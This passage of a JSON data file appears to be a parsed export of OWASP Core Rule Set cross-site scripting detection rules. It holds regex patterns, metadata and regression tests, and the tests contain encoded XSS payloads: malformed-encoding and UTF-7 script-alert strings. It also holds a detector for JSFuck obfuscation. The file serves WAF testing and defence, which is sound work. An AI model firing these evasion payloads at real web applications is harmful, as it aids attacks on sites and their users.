"act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 524, "act_quote": "no_quote", "act_arg": "cssDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 524, "act_quote": "no_quote", "act_arg": "removeNulls", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 525, "act_quote": "quotes", "act_arg": "IE XSS Filters - Attack Detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 526, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 527, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 528, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 529, "act_quote": "quotes", "act_arg": "platform-internet-explorer", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 530, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 531, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 532, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 533, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 534, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 535, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 536, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 537, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 538, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 539, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 519 } }, { "rule_id": "941300", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)" }, "expected": { "should_block": true, "rule_ids": [ 941300 ] }, "malicious_patterns": [ { "location": "post_body", "value": "payload=" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 542, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)]*[\\xbe>]|<[^\\xbe]*\\xbe", "negated": false } }, "transformations": [ "none", "lowercase", "urlDecodeUni", "htmlEntityDecode", "jsDecode" ], "metadata": { "phase": "2", "message": "US-ASCII Malformed Encoding XSS Filter - Attack Detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-tomcat", "attack-xss", "xss-perf-disable", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242" ] }, "test_cases": [ { "description": "Positive test using single byte", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xbcscript\\xbealert(\\xa2XSS\\xa2)\\xbc/script\\xbe" }, "expected": { "should_block": true, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xbcscript\\xbealert(\\xa2XSS\\xa2)\\xbc/script\\xbe" } ] }, { "description": "Positive test using utf-8", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xc2\\xbcscript\\xc2\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xc2\\xbc/script\\xc2\\xbe" }, "expected": { "should_block": true, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xc2\\xbcscript\\xc2\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xc2\\xbc/script\\xc2\\xbe" } ] }, { "description": "Positive test using alternate utf-8", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xd0\\xbcscript\\xd0\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xd0\\xbc/script\\xd0\\xbe" }, "expected": { "should_block": true, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xd0\\xbcscript\\xd0\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xd0\\xbc/script\\xd0\\xbe" } ] }, { "description": "Real world false positive for old rule with Russian utf-8 characters", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xd0\\xb0\\xd0\\xb1\\xd0\\xb2\\xd0\\xb3\\xd0\\xb4\\xd0\\xb5\\xd1\\x91\\xd0\\xb6\\xd0\\xb7\\xd0\\xb8\\xd0\\xb9\\xd0\\xba\\xd0\\xbb\\xd0\\xbc\\xd0\\xbd\\xd0\\xbe\\xd0\\xbf\\xd1\\x80\\xd1\\x81\\xd1\\x82\\xd1\\x83\\xd1\\x84\\xd1\\x85\\xd1\\x86\\xd1\\x87\\xd1\\x88\\xd1\\x89\\xd1\\x8a\\xd1\\x8b\\xd1\\x8d\\xd1\\x8e\\xd1\\x8f" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xd0\\xb0\\xd0\\xb1\\xd0\\xb2\\xd0\\xb3\\xd0\\xb4\\xd0\\xb5\\xd1\\x91\\xd0\\xb6\\xd0\\xb7\\xd0\\xb8\\xd0\\xb9\\xd0\\xba\\xd0\\xbb\\xd0\\xbc\\xd0\\xbd\\xd0\\xbe\\xd0\\xbf\\xd1\\x80\\xd1\\x81\\xd1\\x82\\xd1\\x83\\xd1\\x84\\xd1\\x85\\xd1\\x86\\xd1\\x87\\xd1\\x88\\xd1\\x89\\xd1\\x8a\\xd1\\x8b\\xd1\\x8d\\xd1\\x8e\\xd1\\x8f" } ] }, { "description": "Real world false positive for old rule with German utf-8 characters", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=de_matten & sitzbez\\xc3\\x83\\xc2\\xbcge > fu\\xc3\\x83\\xc2\\x9fmatten_mt" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=de_matten & sitzbez\\xc3\\x83\\xc2\\xbcge > fu\\xc3\\x83\\xc2\\x9fmatten_mt" } ] }, { "description": "Negative test for opening tag", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xbc\\xbc" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xbc\\xbc" } ] }, { "description": "Negative test for closing tag", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xbe\\xbe" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xbe\\xbe" } ] }, { "description": "Negative for missing end tag, opening tag", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xd0\\xbcscript\\xd0\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xd0\\xbc/script\\xd0" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xd0\\xbcscript\\xd0\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xd0\\xbc/script\\xd0" } ] }, { "description": "Negative for missing end tag, closing tag", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xd0\\xbcscript\\xd0\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xd0/script\\xd0\\xbe" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xd0\\xbcscript\\xd0\\xbealert(\\xc2\\xa2XSS\\xc2\\xa2)\\xd0/script\\xd0\\xbe" } ] }, { "description": "Negative using real world Russian example in utf-8", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xd0\\xb0\\xd0\\xb1\\xd0\\xb2\\xd0\\xb3\\xd0\\xb4\\xd0\\xb5\\xd1\\x91\\xd0\\xb6\\xd0\\xb7\\xd0\\xb8\\xd0\\xb9\\xd0\\xba\\xd0\\xbb\\xd0\\xbc\\xd0\\xbd\\xd0\\xbf\\xd1\\x80\\xd1\\x81\\xd1\\x82\\xd1\\x83\\xd1\\x84\\xd1\\x85\\xd1\\x86\\xd1\\x87\\xd1\\x88\\xd1\\x89\\xd1\\x8a\\xd1\\x8b\\xd1\\x8d\\xd1\\x8e\\xd1\\x8f" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xd0\\xb0\\xd0\\xb1\\xd0\\xb2\\xd0\\xb3\\xd0\\xb4\\xd0\\xb5\\xd1\\x91\\xd0\\xb6\\xd0\\xb7\\xd0\\xb8\\xd0\\xb9\\xd0\\xba\\xd0\\xbb\\xd0\\xbc\\xd0\\xbd\\xd0\\xbf\\xd1\\x80\\xd1\\x81\\xd1\\x82\\xd1\\x83\\xd1\\x84\\xd1\\x85\\xd1\\x86\\xd1\\x87\\xd1\\x88\\xd1\\x89\\xd1\\x8a\\xd1\\x8b\\xd1\\x8d\\xd1\\x8e\\xd1\\x8f" } ] }, { "description": "Negative using real world Russian example in utf-8, variant", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded; charset=us-ascii", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\xd0\\xb0\\xd0\\xb1\\xd0\\xb2\\xd0\\xb3\\xd0\\xb4\\xd0\\xb5\\xd1\\x91\\xd0\\xb6\\xd0\\xb7\\xd0\\xb8\\xd0\\xb9\\xd0\\xba\\xd0\\xbb\\xd0\\xbd\\xd0\\xbe\\xd0\\xbf\\xd1\\x80\\xd1\\x81\\xd1\\x82\\xd1\\x83\\xd1\\x84\\xd1\\x85\\xd1\\x86\\xd1\\x87\\xd1\\x88\\xd1\\x89\\xd1\\x8a\\xd1\\x8b\\xd1\\x8d\\xd1\\x8e\\xd1\\x8f" }, "expected": { "should_block": false, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\xd0\\xb0\\xd0\\xb1\\xd0\\xb2\\xd0\\xb3\\xd0\\xb4\\xd0\\xb5\\xd1\\x91\\xd0\\xb6\\xd0\\xb7\\xd0\\xb8\\xd0\\xb9\\xd0\\xba\\xd0\\xbb\\xd0\\xbd\\xd0\\xbe\\xd0\\xbf\\xd1\\x80\\xd1\\x81\\xd1\\x82\\xd1\\x83\\xd1\\x84\\xd1\\x85\\xd1\\x86\\xd1\\x87\\xd1\\x88\\xd1\\x89\\xd1\\x8a\\xd1\\x8b\\xd1\\x8d\\xd1\\x8e\\xd1\\x8f" } ] }, { "description": "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "test=\\xbctest\\xbetest(\\xa2XSS\\xa2)\\xbc/test\\xbe" }, "expected": { "should_block": true, "rule_ids": [ 941310 ] }, "malicious_patterns": [ { "location": "post_body", "value": "test=\\xbctest\\xbetest(\\xa2XSS\\xa2)\\xbc/test\\xbe" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 603, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\xbc[^\\xbe>]*[\\xbe>]|<[^\\xbe]*\\xbe", "actions": [ { "act_name": "id", "lineno": 604, "act_quote": "no_quote", "act_arg": "941310", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 605, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 606, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 607, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 608, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 608, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 608, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 608, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 608, "act_quote": "no_quote", "act_arg": "jsDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 609, "act_quote": "quotes", "act_arg": "US-ASCII Malformed Encoding XSS Filter - Attack Detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 610, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 611, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 612, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 613, "act_quote": "quotes", "act_arg": "platform-tomcat", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 614, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 615, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 616, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 617, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 618, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 619, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 620, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 621, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "chain", "lineno": 622, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": true, "operator_negated": false, "oplineno": 603 } }, { "rule_id": null, "has_tests": false, "detection": { "variables": [ { "name": "MATCHED_VARS", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:\\xbc\\s*/\\s*[^\\xbe>]*[\\xbe>])|(?:<\\s*/\\s*[^\\xbe]*\\xbe)", "negated": false } }, "transformations": [], "metadata": {}, "attack_info": { "type": [], "severity": null, "tags": [] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 623, "variables": [ { "variable": "MATCHED_VARS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:\\xbc\\s*/\\s*[^\\xbe>]*[\\xbe>])|(?:<\\s*/\\s*[^\\xbe]*\\xbe)", "actions": [ { "act_name": "setvar", "lineno": 624, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 625, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 623 } }, { "rule_id": "941350", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "\\+ADw-.*(?:\\+AD4-|>)|<.*\\+AD4-", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "htmlEntityDecode", "jsDecode" ], "metadata": { "phase": "2", "message": "UTF-7 Encoding IE XSS - Attack Detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-internet-explorer", "attack-xss", "xss-perf-disable", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242" ] }, "test_cases": [ { "description": "GH issue 1514", "test_id": 1, "request": { "method": "GET", "uri": "/get/xx?id=%252bADw-script%252bAD4-", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Host": "localhost", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941350 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "id=%252bADw-script%252bAD4-" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 633, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "\\+ADw-.*(?:\\+AD4-|>)|<.*\\+AD4-", "actions": [ { "act_name": "id", "lineno": 634, "act_quote": "no_quote", "act_arg": "941350", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 635, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 636, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 637, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 638, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 638, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 638, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 638, "act_quote": "no_quote", "act_arg": "jsDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 639, "act_quote": "quotes", "act_arg": "UTF-7 Encoding IE XSS - Attack Detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 640, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 641, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 642, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 643, "act_quote": "quotes", "act_arg": "platform-internet-explorer", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 644, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 645, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 646, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 647, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 648, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 649, "act_quote": "quotes", "act_arg": "capec/1000/152/242", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 650, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 651, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 652, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 653, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 633 } }, { "rule_id": "941360", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "![!+ ]\\[\\]", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "2", "message": "JSFuck / Hieroglyphy obfuscation detected", "logdata": "Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "attack-xss", "xss-perf-disable", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242/63" ] }, "test_cases": [ { "description": "JSFuck / Hieroglyphy payload obfuscation attack", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": 